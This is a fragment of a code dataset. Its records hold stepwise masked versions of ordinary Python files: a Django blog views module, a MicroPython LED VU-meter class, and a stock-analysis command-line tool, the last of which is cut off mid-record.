"step-3": "<mask token>\nadmin.site.register(Blog)\n\n\ndef home(request):\n blogs = Blog.objects\n return render(request, 'home.html', {'blogs': blogs})\n\n\ndef detail(request, blog_id):\n blog_detail = get_object_or_404(Blog, pk=blog_id)\n return render(request, 'detail.html', {'blog': blog_detail})\n\n\ndef new(request):\n return render(request, 'new.html')\n\n\ndef create(request):\n blog = Blog()\n blog.title = request.GET['title']\n blog.body = request.GET['body']\n blog.pub_date = timezone.datetime.now()\n blog.save()\n return redirect('/blog/' + str(blog.id))\n",
"step-4": "from django.shortcuts import render, get_object_or_404, redirect\nfrom django.contrib import admin\nfrom .models import Blog\nfrom django.utils import timezone\nadmin.site.register(Blog)\n\n\ndef home(request):\n blogs = Blog.objects\n return render(request, 'home.html', {'blogs': blogs})\n\n\ndef detail(request, blog_id):\n blog_detail = get_object_or_404(Blog, pk=blog_id)\n return render(request, 'detail.html', {'blog': blog_detail})\n\n\ndef new(request):\n return render(request, 'new.html')\n\n\ndef create(request):\n blog = Blog()\n blog.title = request.GET['title']\n blog.body = request.GET['body']\n blog.pub_date = timezone.datetime.now()\n blog.save()\n return redirect('/blog/' + str(blog.id))\n",
"step-5": "from django.shortcuts import render,get_object_or_404, redirect\nfrom django.contrib import admin #어드민 쓸꺼면 써야됨\nfrom .models import Blog #앱을 가지고 오겠다는거\nfrom django.utils import timezone\n\nadmin.site.register(Blog) #블로그 형식을 가져와 등록하겠다.\n# Create your views here.\ndef home(request):\n blogs = Blog.objects\n return render(request,'home.html',{'blogs':blogs})\n\ndef detail(request,blog_id):\n blog_detail= get_object_or_404(Blog,pk=blog_id)\n return render(request,'detail.html',{'blog': blog_detail})\n\ndef new(request):\n return render(request,'new.html')\n\ndef create(request):\n blog=Blog()\n blog.title=request.GET['title']\n blog.body=request.GET['body']\n blog.pub_date=timezone.datetime.now()\n blog.save()\n return redirect('/blog/'+str(blog.id))",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
# Global version information
__version__ = "0.6.1"
|
normal
|
{
"blob_id": "8aeb7786984f27fabdcaffa54f52eb868c277fdb",
"index": 7707,
"step-1": "<mask token>\n",
"step-2": "__version__ = '0.6.1'\n",
"step-3": "# Global version information\n__version__ = \"0.6.1\"\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
#Copyright [2017] [Mauro Riva <lemariva@mail.com> <lemariva.com>]
#Licensed under the Apache License, Version 2.0 (the "License");
#you may not use this file except in compliance with the License.
#You may obtain a copy of the License at
#http://www.apache.org/licenses/LICENSE-2.0
#Unless required by applicable law or agreed to in writing, software
#distributed under the License is distributed on an "AS IS" BASIS,
#WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#See the License for the specific language governing permissions and
#limitations under the License.
#The above copyright notice and this permission notice shall be
#included in all copies or substantial portions of the Software.
import math as m
import utime
from machine import ADC
from ws2812 import WS2812
class vu_meter:
ledsColors = []
def __init__(self, ledNumber=144, ledPower = 100, adcWindow = 1500, adcMax = 100, adcPin = 'P13', pinLEDs = 'P22'):
self.ledPower = ledPower
self.ledNumber = ledNumber
self.pinLeds = pinLEDs
self.adcPin = adcPin
self.adcWindow = adcWindow
self.ledsColors = []
self.adcIn = 0.0
self.adcMax = adcMax
self.adcMaxDynamic = False
        # initialize ADC
self.init_adc()
self.init_leds()
def init_adc(self):
self.adc = ADC(0)
self.adcUnit = self.adc.channel(pin=self.adcPin)
self.adcMean = 0
def init_leds(self):
self.ledsColors = []
for x in range(0, self.ledNumber):
color = self.color_vu_meter (x)
self.ledsColors.append(color)
self.ledChain = WS2812( ledNumber=self.ledNumber, brightness=self.ledPower, dataPin=self.pinLeds ) # dataPin is for LoPy board only
self.ledChain.show( self.ledsColors )
def test_leds(self):
testData = self.ledsColors
for x in range(0, self.ledNumber):
testData = testData[1:] + testData[0:1]
self.ledChain.show( testData )
self.ledChain.show([])
def lighter(self, color, percent):
percent = percent / 100
if(percent == 1):
return color
if(percent == 0):
return ([0, 0, 0])
        #if(percent < 0.65):		# driver does not work correctly when percent is under 0.65
# percent = 0.65
rcolor = color[0] - color[0] * (1-percent)
gcolor = color[1] - color[1] * (1-percent)
bcolor = color[2] - color[2] * (1-percent)
newcolor = ([(rcolor), (gcolor), (bcolor)])
return newcolor
def color_vu_meter(self, position):
rcolor = (255 * position) / self.ledNumber
gcolor = (255 * (self.ledNumber - position)) / self.ledNumber
bcolor= 0
newcolor = self.lighter([(rcolor), (gcolor), (bcolor)], self.ledPower)
return newcolor
def adc_max_dynamic(self, state = True, adcMax = 100):
self.adcMaxDynamic = state
self.adcMax = adcMax
return self.adcMaxDynamic
def adc_max(self):
return self.adcMax
def zero_calibration(self):
self.adcMean = 0
for y in range(0, self.adcWindow):
self.adcMean = self.adcMean + self.adcUnit.value()
self.adcMean = self.adcMean / self.adcWindow
return self.adcMean
def update_rms(self):
t1 = utime.ticks_ms()
power = 0
self.audioPower = 0
for x in range(0, self.adcWindow):
adc_value = self.adcUnit.value() - self.adcMean
power = power + m.pow(adc_value, 2)
power = (m.sqrt(power / self.adcWindow))
self.audioPower = power
t2 = utime.ticks_ms()
time_elapsed = t2 - t1
if(self.adcMaxDynamic):
if(self.adcMax < power):
self.adcMax = power
self.normalizedPower = power / self.adcMax
#20 * log10(sqrt(sum / count))
if(self.normalizedPower > 1):
self.normalizedPower = 1
return [time_elapsed, power]
def update_leds(self):
leds_count = m.floor(self.normalizedPower * self.ledNumber)
self.ledChain.show( self.ledsColors[1:leds_count] )
|
normal
|
{
"blob_id": "894d8d00fd05bf8648f1b95ecf30b70e7b4e841b",
"index": 8640,
"step-1": "<mask token>\n\n\nclass vu_meter:\n <mask token>\n <mask token>\n\n def init_adc(self):\n self.adc = ADC(0)\n self.adcUnit = self.adc.channel(pin=self.adcPin)\n self.adcMean = 0\n\n def init_leds(self):\n self.ledsColors = []\n for x in range(0, self.ledNumber):\n color = self.color_vu_meter(x)\n self.ledsColors.append(color)\n self.ledChain = WS2812(ledNumber=self.ledNumber, brightness=self.\n ledPower, dataPin=self.pinLeds)\n self.ledChain.show(self.ledsColors)\n <mask token>\n\n def lighter(self, color, percent):\n percent = percent / 100\n if percent == 1:\n return color\n if percent == 0:\n return [0, 0, 0]\n rcolor = color[0] - color[0] * (1 - percent)\n gcolor = color[1] - color[1] * (1 - percent)\n bcolor = color[2] - color[2] * (1 - percent)\n newcolor = [rcolor, gcolor, bcolor]\n return newcolor\n <mask token>\n <mask token>\n <mask token>\n\n def zero_calibration(self):\n self.adcMean = 0\n for y in range(0, self.adcWindow):\n self.adcMean = self.adcMean + self.adcUnit.value()\n self.adcMean = self.adcMean / self.adcWindow\n return self.adcMean\n\n def update_rms(self):\n t1 = utime.ticks_ms()\n power = 0\n self.audioPower = 0\n for x in range(0, self.adcWindow):\n adc_value = self.adcUnit.value() - self.adcMean\n power = power + m.pow(adc_value, 2)\n power = m.sqrt(power / self.adcWindow)\n self.audioPower = power\n t2 = utime.ticks_ms()\n time_elapsed = t2 - t1\n if self.adcMaxDynamic:\n if self.adcMax < power:\n self.adcMax = power\n self.normalizedPower = power / self.adcMax\n if self.normalizedPower > 1:\n self.normalizedPower = 1\n return [time_elapsed, power]\n\n def update_leds(self):\n leds_count = m.floor(self.normalizedPower * self.ledNumber)\n self.ledChain.show(self.ledsColors[1:leds_count])\n",
"step-2": "<mask token>\n\n\nclass vu_meter:\n <mask token>\n\n def __init__(self, ledNumber=144, ledPower=100, adcWindow=1500, adcMax=\n 100, adcPin='P13', pinLEDs='P22'):\n self.ledPower = ledPower\n self.ledNumber = ledNumber\n self.pinLeds = pinLEDs\n self.adcPin = adcPin\n self.adcWindow = adcWindow\n self.ledsColors = []\n self.adcIn = 0.0\n self.adcMax = adcMax\n self.adcMaxDynamic = False\n self.init_adc()\n self.init_leds()\n\n def init_adc(self):\n self.adc = ADC(0)\n self.adcUnit = self.adc.channel(pin=self.adcPin)\n self.adcMean = 0\n\n def init_leds(self):\n self.ledsColors = []\n for x in range(0, self.ledNumber):\n color = self.color_vu_meter(x)\n self.ledsColors.append(color)\n self.ledChain = WS2812(ledNumber=self.ledNumber, brightness=self.\n ledPower, dataPin=self.pinLeds)\n self.ledChain.show(self.ledsColors)\n <mask token>\n\n def lighter(self, color, percent):\n percent = percent / 100\n if percent == 1:\n return color\n if percent == 0:\n return [0, 0, 0]\n rcolor = color[0] - color[0] * (1 - percent)\n gcolor = color[1] - color[1] * (1 - percent)\n bcolor = color[2] - color[2] * (1 - percent)\n newcolor = [rcolor, gcolor, bcolor]\n return newcolor\n\n def color_vu_meter(self, position):\n rcolor = 255 * position / self.ledNumber\n gcolor = 255 * (self.ledNumber - position) / self.ledNumber\n bcolor = 0\n newcolor = self.lighter([rcolor, gcolor, bcolor], self.ledPower)\n return newcolor\n\n def adc_max_dynamic(self, state=True, adcMax=100):\n self.adcMaxDynamic = state\n self.adcMax = adcMax\n return self.adcMaxDynamic\n\n def adc_max(self):\n return self.adcMax\n\n def zero_calibration(self):\n self.adcMean = 0\n for y in range(0, self.adcWindow):\n self.adcMean = self.adcMean + self.adcUnit.value()\n self.adcMean = self.adcMean / self.adcWindow\n return self.adcMean\n\n def update_rms(self):\n t1 = utime.ticks_ms()\n power = 0\n self.audioPower = 0\n for x in range(0, self.adcWindow):\n adc_value = self.adcUnit.value() - self.adcMean\n power = power + m.pow(adc_value, 2)\n power = m.sqrt(power / self.adcWindow)\n self.audioPower = power\n t2 = utime.ticks_ms()\n time_elapsed = t2 - t1\n if self.adcMaxDynamic:\n if self.adcMax < power:\n self.adcMax = power\n self.normalizedPower = power / self.adcMax\n if self.normalizedPower > 1:\n self.normalizedPower = 1\n return [time_elapsed, power]\n\n def update_leds(self):\n leds_count = m.floor(self.normalizedPower * self.ledNumber)\n self.ledChain.show(self.ledsColors[1:leds_count])\n",
"step-3": "<mask token>\n\n\nclass vu_meter:\n <mask token>\n\n def __init__(self, ledNumber=144, ledPower=100, adcWindow=1500, adcMax=\n 100, adcPin='P13', pinLEDs='P22'):\n self.ledPower = ledPower\n self.ledNumber = ledNumber\n self.pinLeds = pinLEDs\n self.adcPin = adcPin\n self.adcWindow = adcWindow\n self.ledsColors = []\n self.adcIn = 0.0\n self.adcMax = adcMax\n self.adcMaxDynamic = False\n self.init_adc()\n self.init_leds()\n\n def init_adc(self):\n self.adc = ADC(0)\n self.adcUnit = self.adc.channel(pin=self.adcPin)\n self.adcMean = 0\n\n def init_leds(self):\n self.ledsColors = []\n for x in range(0, self.ledNumber):\n color = self.color_vu_meter(x)\n self.ledsColors.append(color)\n self.ledChain = WS2812(ledNumber=self.ledNumber, brightness=self.\n ledPower, dataPin=self.pinLeds)\n self.ledChain.show(self.ledsColors)\n\n def test_leds(self):\n testData = self.ledsColors\n for x in range(0, self.ledNumber):\n testData = testData[1:] + testData[0:1]\n self.ledChain.show(testData)\n self.ledChain.show([])\n\n def lighter(self, color, percent):\n percent = percent / 100\n if percent == 1:\n return color\n if percent == 0:\n return [0, 0, 0]\n rcolor = color[0] - color[0] * (1 - percent)\n gcolor = color[1] - color[1] * (1 - percent)\n bcolor = color[2] - color[2] * (1 - percent)\n newcolor = [rcolor, gcolor, bcolor]\n return newcolor\n\n def color_vu_meter(self, position):\n rcolor = 255 * position / self.ledNumber\n gcolor = 255 * (self.ledNumber - position) / self.ledNumber\n bcolor = 0\n newcolor = self.lighter([rcolor, gcolor, bcolor], self.ledPower)\n return newcolor\n\n def adc_max_dynamic(self, state=True, adcMax=100):\n self.adcMaxDynamic = state\n self.adcMax = adcMax\n return self.adcMaxDynamic\n\n def adc_max(self):\n return self.adcMax\n\n def zero_calibration(self):\n self.adcMean = 0\n for y in range(0, self.adcWindow):\n self.adcMean = self.adcMean + self.adcUnit.value()\n self.adcMean = self.adcMean / self.adcWindow\n return self.adcMean\n\n def update_rms(self):\n t1 = utime.ticks_ms()\n power = 0\n self.audioPower = 0\n for x in range(0, self.adcWindow):\n adc_value = self.adcUnit.value() - self.adcMean\n power = power + m.pow(adc_value, 2)\n power = m.sqrt(power / self.adcWindow)\n self.audioPower = power\n t2 = utime.ticks_ms()\n time_elapsed = t2 - t1\n if self.adcMaxDynamic:\n if self.adcMax < power:\n self.adcMax = power\n self.normalizedPower = power / self.adcMax\n if self.normalizedPower > 1:\n self.normalizedPower = 1\n return [time_elapsed, power]\n\n def update_leds(self):\n leds_count = m.floor(self.normalizedPower * self.ledNumber)\n self.ledChain.show(self.ledsColors[1:leds_count])\n",
"step-4": "import math as m\nimport utime\nfrom machine import ADC\nfrom ws2812 import WS2812\n\n\nclass vu_meter:\n ledsColors = []\n\n def __init__(self, ledNumber=144, ledPower=100, adcWindow=1500, adcMax=\n 100, adcPin='P13', pinLEDs='P22'):\n self.ledPower = ledPower\n self.ledNumber = ledNumber\n self.pinLeds = pinLEDs\n self.adcPin = adcPin\n self.adcWindow = adcWindow\n self.ledsColors = []\n self.adcIn = 0.0\n self.adcMax = adcMax\n self.adcMaxDynamic = False\n self.init_adc()\n self.init_leds()\n\n def init_adc(self):\n self.adc = ADC(0)\n self.adcUnit = self.adc.channel(pin=self.adcPin)\n self.adcMean = 0\n\n def init_leds(self):\n self.ledsColors = []\n for x in range(0, self.ledNumber):\n color = self.color_vu_meter(x)\n self.ledsColors.append(color)\n self.ledChain = WS2812(ledNumber=self.ledNumber, brightness=self.\n ledPower, dataPin=self.pinLeds)\n self.ledChain.show(self.ledsColors)\n\n def test_leds(self):\n testData = self.ledsColors\n for x in range(0, self.ledNumber):\n testData = testData[1:] + testData[0:1]\n self.ledChain.show(testData)\n self.ledChain.show([])\n\n def lighter(self, color, percent):\n percent = percent / 100\n if percent == 1:\n return color\n if percent == 0:\n return [0, 0, 0]\n rcolor = color[0] - color[0] * (1 - percent)\n gcolor = color[1] - color[1] * (1 - percent)\n bcolor = color[2] - color[2] * (1 - percent)\n newcolor = [rcolor, gcolor, bcolor]\n return newcolor\n\n def color_vu_meter(self, position):\n rcolor = 255 * position / self.ledNumber\n gcolor = 255 * (self.ledNumber - position) / self.ledNumber\n bcolor = 0\n newcolor = self.lighter([rcolor, gcolor, bcolor], self.ledPower)\n return newcolor\n\n def adc_max_dynamic(self, state=True, adcMax=100):\n self.adcMaxDynamic = state\n self.adcMax = adcMax\n return self.adcMaxDynamic\n\n def adc_max(self):\n return self.adcMax\n\n def zero_calibration(self):\n self.adcMean = 0\n for y in range(0, self.adcWindow):\n self.adcMean = self.adcMean + self.adcUnit.value()\n self.adcMean = self.adcMean / self.adcWindow\n return self.adcMean\n\n def update_rms(self):\n t1 = utime.ticks_ms()\n power = 0\n self.audioPower = 0\n for x in range(0, self.adcWindow):\n adc_value = self.adcUnit.value() - self.adcMean\n power = power + m.pow(adc_value, 2)\n power = m.sqrt(power / self.adcWindow)\n self.audioPower = power\n t2 = utime.ticks_ms()\n time_elapsed = t2 - t1\n if self.adcMaxDynamic:\n if self.adcMax < power:\n self.adcMax = power\n self.normalizedPower = power / self.adcMax\n if self.normalizedPower > 1:\n self.normalizedPower = 1\n return [time_elapsed, power]\n\n def update_leds(self):\n leds_count = m.floor(self.normalizedPower * self.ledNumber)\n self.ledChain.show(self.ledsColors[1:leds_count])\n",
"step-5": "#Copyright [2017] [Mauro Riva <lemariva@mail.com> <lemariva.com>]\n\n#Licensed under the Apache License, Version 2.0 (the \"License\");\n#you may not use this file except in compliance with the License.\n#You may obtain a copy of the License at\n\n#http://www.apache.org/licenses/LICENSE-2.0\n\n#Unless required by applicable law or agreed to in writing, software\n#distributed under the License is distributed on an \"AS IS\" BASIS,\n#WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n#See the License for the specific language governing permissions and\n#limitations under the License.\n\n#The above copyright notice and this permission notice shall be\n#included in all copies or substantial portions of the Software. \n\nimport math as m\nimport utime\n\nfrom machine import ADC\nfrom ws2812 import WS2812\n\nclass vu_meter: \n ledsColors = []\n \n def __init__(self, ledNumber=144, ledPower = 100, adcWindow = 1500, adcMax = 100, adcPin = 'P13', pinLEDs = 'P22'):\n self.ledPower = ledPower\n self.ledNumber = ledNumber \n self.pinLeds = pinLEDs\n self.adcPin = adcPin \n self.adcWindow = adcWindow\n self.ledsColors = [] \n self.adcIn = 0.0\n self.adcMax = adcMax\n self.adcMaxDynamic = False \n # inizialize ADC\n self.init_adc()\n self.init_leds()\n\n def init_adc(self):\n self.adc = ADC(0)\n self.adcUnit = self.adc.channel(pin=self.adcPin)\n self.adcMean = 0\n \n def init_leds(self):\n self.ledsColors = [] \n for x in range(0, self.ledNumber):\n color = self.color_vu_meter (x)\n self.ledsColors.append(color)\n \n self.ledChain = WS2812( ledNumber=self.ledNumber, brightness=self.ledPower, dataPin=self.pinLeds ) # dataPin is for LoPy board only \n self.ledChain.show( self.ledsColors ) \n \n def test_leds(self):\n testData = self.ledsColors\n for x in range(0, self.ledNumber):\n testData = testData[1:] + testData[0:1]\n self.ledChain.show( testData ) \n self.ledChain.show([]) \n \n def lighter(self, color, percent):\n percent = percent / 100\n if(percent == 1):\n return color\n if(percent == 0):\n return ([0, 0, 0])\t\n #if(percent < 0.65):\t\t# driver not working ok with percent under 0.65 \n # percent = 0.65\n\n rcolor = color[0] - color[0] * (1-percent)\n gcolor = color[1] - color[1] * (1-percent)\n bcolor = color[2] - color[2] * (1-percent)\n newcolor = ([(rcolor), (gcolor), (bcolor)])\n return newcolor\t\t\n\n def color_vu_meter(self, position):\n rcolor = (255 * position) / self.ledNumber\n gcolor = (255 * (self.ledNumber - position)) / self.ledNumber \n bcolor= 0\n newcolor = self.lighter([(rcolor), (gcolor), (bcolor)], self.ledPower)\n return newcolor\n \n def adc_max_dynamic(self, state = True, adcMax = 100): \n self.adcMaxDynamic = state\n self.adcMax = adcMax\n return self.adcMaxDynamic\n \n def adc_max(self):\n return self.adcMax\n \n def zero_calibration(self):\n self.adcMean = 0 \n for y in range(0, self.adcWindow): \n self.adcMean = self.adcMean + self.adcUnit.value()\n self.adcMean = self.adcMean / self.adcWindow \n return self.adcMean\n \n def update_rms(self):\n t1 = utime.ticks_ms() \n power = 0\n self.audioPower = 0\n for x in range(0, self.adcWindow): \n adc_value = self.adcUnit.value() - self.adcMean\n power = power + m.pow(adc_value, 2) \n \n power = (m.sqrt(power / self.adcWindow))\n self.audioPower = power \n \n t2 = utime.ticks_ms()\n time_elapsed = t2 - t1 \n \n if(self.adcMaxDynamic):\n if(self.adcMax < power):\n self.adcMax = power\n \n self.normalizedPower = power / self.adcMax\n #20 * log10(sqrt(sum / count))\n \n if(self.normalizedPower 
> 1):\n self.normalizedPower = 1 \n \n return [time_elapsed, power]\n \n def update_leds(self): \n leds_count = m.floor(self.normalizedPower * self.ledNumber) \n self.ledChain.show( self.ledsColors[1:leds_count] )\n",
"step-ids": [
7,
11,
12,
14,
15
]
}
|
[
7,
11,
12,
14,
15
] |
import stock as stk
import portfolio as portf
import plot
import sys
import cmd
import os
import decision as des
class CLI(cmd.Cmd):
def __init__(self):
cmd.Cmd.__init__(self)
self.prompt = '$> '
self.stk_data_coll = stk.StockDataCollection()
self.add_to_plot_lst = []
self.paralel_count = 10
def do_set_paralel_count(self, arg):
self.paralel_count = arg
def do_get_paralel_count(self, arg):
print self.paralel_count
def help_set_paralel_count(self):
print "syntax: set_paralel_count [NUMBER]",
print "-- update self.paralel_count for load command"
def do_load_collection(self, arg):
self.stk_data_coll.load(conf_file=arg, paralel_count=self.paralel_count)
print "---------------------------------------"
print "Data downloaded for ", arg
def help_load_collection(self):
print "syntax: load [portfolio file]",
print "-- load/updates the tickers from portfolio file"
def do_set_collection(self, arg):
self.stk_data_coll.set_colection(arg)
def help_set_collection(self):
print "syntax: set_collection [portfolio file]",
print "-- set the tickers from portfolio file"
def do_get_collection(self, arg):
print "-----------------------------"
print " Collection from ", self.stk_data_coll.conf_file
print "-----------------------------"
for c in self.stk_data_coll.stk_data_coll:
print c
def do_cleanup(self, arg):
filelist = [ f for f in os.listdir("./data") if f.endswith(".dat") ]
for f in filelist:
os.remove("./data/" + f)
def help_cleanup(self):
print "syntax: cleanup",
print "-- removes all data files"
def do_plot_indexes(self, arg):
indexes = arg.split(',',1)
a_plot = plot.Plot(plot.PlotCellIndex(indexes[0]))
try:
for index in indexes[1:]:
p = plot.PlotCellIndex(index)
a_plot.addSimple(plot.PlotCell((p.data,p.dates)))
finally: a_plot.plot()
def help_plot_indexes(self):
print "syntax: plot_index [index_name1,index_name2,....]",
print "-- plot slimple index from csv"
def do_plot_ticker_indexes(self,arg):
calc = stk.StockCalcIndex(self.stk_data_coll)
sd = stk.StockData()
ticker, indexes, startdate = arg.split()
indexes = indexes.split(',',1)
sd.load(ticker, startdate)
a_plot = plot.Plot(plot.PlotCell((sd.Cs,sd.dates)))
a_plot.addSimple(plot.PlotCell( calc.sma((sd.Cs, sd.dates), 200),overlay=True))
a_plot.addSimple(plot.PlotCell( calc.sma((sd.Cs, sd.dates), 50),overlay=True))
for index in indexes:
p = plot.PlotCellIndex(index)
p.truncate(startdate)
a_plot.addSimple(plot.PlotCell((p.data,p.dates)))
a_plot.addSimple(plot.PlotCell(calc.sma((p.data,p.dates),20)))
a_plot.addSimple(plot.PlotCell(calc.sma((p.data,p.dates),50),overlay=True))
a_plot.plot()
def do_plot_collection(self, arg):
calc = stk.StockCalcIndex(self.stk_data_coll)
sd = stk.StockData()
ticker, startdate = arg.split()
sd.load(ticker, startdate)
a_plot = plot.Plot(plot.PlotCell((sd.Cs,sd.dates)))
a_plot.addSimple(plot.PlotCell( calc.sma((sd.Cs, sd.dates), 200),overlay=True))
a_plot.addSimple(plot.PlotCell( calc.sma((sd.Cs, sd.dates), 50),overlay=True))
a_plot.addSimple(plot.PlotCell( calc.llv((sd.Cs, sd.dates), 100),overlay=True))
a_plot.addSimple(plot.PlotCell( calc.sma((sd.Vs,sd.dates),20 )))
a_plot.addSimple(plot.PlotCell( calc.obv((sd.Cs,sd.Vs,sd.dates) )))
a_plot.addSimple(plot.PlotCell( calc.correlation_adj((sd.Cs,sd.dates))))
a_plot.plot()
def do_plot(self, arg):
calc = stk.StockCalcIndex(self.stk_data_coll)
sd = stk.StockData()
ticker, startdate = arg.split()
sd.load(ticker, startdate)
a_plot = plot.Plot(plot.PlotCell((sd.Cs,sd.dates)))
a_plot.addSimple(plot.PlotCell( calc.sma((sd.Cs, sd.dates), 200),overlay=True))
a_plot.addSimple(plot.PlotCell( calc.sma((sd.Cs, sd.dates), 50),overlay=True))
a_plot.addSimple(plot.PlotCell( calc.llv((sd.Cs, sd.dates), 100),overlay=True))
a_plot.addSimple(plot.PlotCell( calc.sma((sd.Vs,sd.dates),20 )))
arr_obv = calc.obv((sd.Cs,sd.Vs,sd.dates) )
a_plot.addSimple(plot.PlotCell( arr_obv))
a_plot.addSimple(plot.PlotCell( calc.sma(arr_obv, 20),overlay=True))
a_plot.addSimple(plot.PlotCell( calc.sma(arr_obv, 60),overlay=True))
a_plot.plot()
def help_plot(self):
print "syntax: plot [ticker] []|[start date YYYYMMDD]",
print "-- plots the ticker"
def do_simulation(self, arg):
ticker, startdate = arg.split()
calc = stk.StockCalcIndex(self.stk_data_coll)
sd = stk.StockData()
sd.load(ticker, startdate)
port = des.DecisionCollection(ticker, 50000)
decision = des.DecisionSimpleSMA(ticker, (sd.Cs, sd.dates), port)
decision.looper()
print ticker, ":", str(port)
port2 = des.DecisionCollection(ticker, 50000)
decision2 = des.DecisionSimpleStopSMA(ticker, (sd.Cs, sd.dates), port2, risk_factor=0.01, )
decision2.looper()
print ticker, ":", str(port2)
port2.print_all()
a_plot = plot.Plot(plot.PlotCell((sd.Cs,sd.dates)))
a_plot.addSimple(plot.PlotCell( calc.sma((sd.Cs, sd.dates), 200),overlay=True))
a_plot.addSimple(plot.PlotCell( calc.sma((sd.Cs, sd.dates), 50),overlay=True))
a_plot.addSimple(plot.PlotCell( calc.llv((sd.Cs, sd.dates), 100),overlay=True))
a_plot.addSimple(plot.PlotCell( port2.get_enter_plot_cell(), overlay=True, color='go' ))
a_plot.addSimple(plot.PlotCell( port2.get_leave_plot_cell(), overlay=True, color='ro' ))
a_plot.addSimple(plot.PlotCell( port2.get_value_plot_cell()))
a_plot.plot()
def help_simulation(self):
print "syntax: simulation [ticker] []|[start date YYYYMMDD]",
print "-- runs a simulation on a single ticker"
def do_simulation_collection(self, arg ):
for ticker in self.stk_data_coll.stk_data_coll:
sd = stk.StockData()
sd.load(ticker, arg)
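            # four variants per ticker: fast and slow SMA crossovers, each with and without a stop rule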
port = des.DecisionCollection(ticker, 50000)
decision = des.DecisionSimpleStopSMA(ticker, (sd.Cs, sd.dates), port, risk_factor=0.02, sma_fast=10, sma_slow=50, stop_per=5)
decision.looper()
port4 = des.DecisionCollection(ticker, 50000)
decision4 = des.DecisionSimpleSMA(ticker, (sd.Cs, sd.dates), port4, sma_fast=10, sma_slow=50, stop_per=5)
decision4.looper()
port2 = des.DecisionCollection(ticker, 50000)
decision2 = des.DecisionSimpleSMA(ticker, (sd.Cs, sd.dates), port2)
decision2.looper()
port3 = des.DecisionCollection(ticker, 50000)
decision3 = des.DecisionSimpleStopSMA(ticker, (sd.Cs, sd.dates), port3, risk_factor=0.02, sma_fast=50, sma_slow=200, stop_per=40)
decision3.looper()
print "STOP_FAST - ", ticker, " ", str(port)
print "SIMPLE_FAST - ", ticker, " ", str(port4)
print "STOP_SLOW - ", ticker, " ", str(port3)
print "SIMPLE_SLOW - ", ticker, " ", str(port2)
def emptyline(self):
pass
def do_quit(self, arg):
sys.exit(1)
if __name__ == "__main__":
cli = CLI()
cli.cmdloop()
|
normal
|
{
"blob_id": "d386047c087155b1809d47349339eb6882cf8e26",
"index": 5013,
"step-1": "import stock as stk\nimport portfolio as portf\nimport plot\nimport sys\nimport cmd\nimport os\nimport decision as des\n \n \nclass CLI(cmd.Cmd):\n\n def __init__(self):\n cmd.Cmd.__init__(self)\n self.prompt = '$> '\n self.stk_data_coll = stk.StockDataCollection()\n self.add_to_plot_lst = []\n self.paralel_count = 10\n \n def do_set_paralel_count(self, arg):\n self.paralel_count = arg\n \n def do_get_paralel_count(self, arg):\n print self.paralel_count\n \n def help_set_paralel_count(self):\n print \"syntax: set_paralel_count [NUMBER]\",\n print \"-- update self.paralel_count for load command\"\n \n \n def do_load_collection(self, arg):\n self.stk_data_coll.load(conf_file=arg, paralel_count=self.paralel_count)\n print \"---------------------------------------\"\n print \"Data downloaded for \", arg \n \n def help_load_collection(self):\n print \"syntax: load [portfolio file]\",\n print \"-- load/updates the tickers from portfolio file\"\n\n def do_set_collection(self, arg):\n self.stk_data_coll.set_colection(arg)\n \n def help_set_collection(self):\n print \"syntax: set_collection [portfolio file]\",\n print \"-- set the tickers from portfolio file\"\n\n \n def do_get_collection(self, arg):\n print \"-----------------------------\"\n print \" Collection from \", self.stk_data_coll.conf_file\n print \"-----------------------------\"\n for c in self.stk_data_coll.stk_data_coll:\n print c\n \n \n def do_cleanup(self, arg):\n filelist = [ f for f in os.listdir(\"./data\") if f.endswith(\".dat\") ]\n for f in filelist:\n os.remove(\"./data/\" + f)\n \n def help_cleanup(self):\n print \"syntax: cleanup\",\n print \"-- removes all data files\"\n \n\n def do_plot_indexes(self, arg): \n indexes = arg.split(',',1)\n a_plot = plot.Plot(plot.PlotCellIndex(indexes[0]))\n try:\n for index in indexes[1:]:\n p = plot.PlotCellIndex(index)\n a_plot.addSimple(plot.PlotCell((p.data,p.dates)))\n finally: a_plot.plot()\n \n def help_plot_indexes(self):\n print \"syntax: plot_index [index_name1,index_name2,....]\",\n print \"-- plot slimple index from csv\"\n \n def do_plot_ticker_indexes(self,arg):\n calc = stk.StockCalcIndex(self.stk_data_coll)\n sd = stk.StockData()\n ticker, indexes, startdate = arg.split()\n indexes = indexes.split(',',1)\n \n sd.load(ticker, startdate)\n a_plot = plot.Plot(plot.PlotCell((sd.Cs,sd.dates)))\n \n a_plot.addSimple(plot.PlotCell( calc.sma((sd.Cs, sd.dates), 200),overlay=True))\n a_plot.addSimple(plot.PlotCell( calc.sma((sd.Cs, sd.dates), 50),overlay=True))\n \n for index in indexes:\n p = plot.PlotCellIndex(index)\n p.truncate(startdate)\n a_plot.addSimple(plot.PlotCell((p.data,p.dates))) \n a_plot.addSimple(plot.PlotCell(calc.sma((p.data,p.dates),20)))\n a_plot.addSimple(plot.PlotCell(calc.sma((p.data,p.dates),50),overlay=True))\n \n a_plot.plot()\n \n def do_plot_collection(self, arg):\n calc = stk.StockCalcIndex(self.stk_data_coll)\n sd = stk.StockData()\n ticker, startdate = arg.split()\n \n sd.load(ticker, startdate)\n a_plot = plot.Plot(plot.PlotCell((sd.Cs,sd.dates)))\n \n a_plot.addSimple(plot.PlotCell( calc.sma((sd.Cs, sd.dates), 200),overlay=True))\n a_plot.addSimple(plot.PlotCell( calc.sma((sd.Cs, sd.dates), 50),overlay=True))\n a_plot.addSimple(plot.PlotCell( calc.llv((sd.Cs, sd.dates), 100),overlay=True))\n\n a_plot.addSimple(plot.PlotCell( calc.sma((sd.Vs,sd.dates),20 )))\n a_plot.addSimple(plot.PlotCell( calc.obv((sd.Cs,sd.Vs,sd.dates) )))\n \n a_plot.addSimple(plot.PlotCell( calc.correlation_adj((sd.Cs,sd.dates))))\n \n a_plot.plot()\n\n\n def 
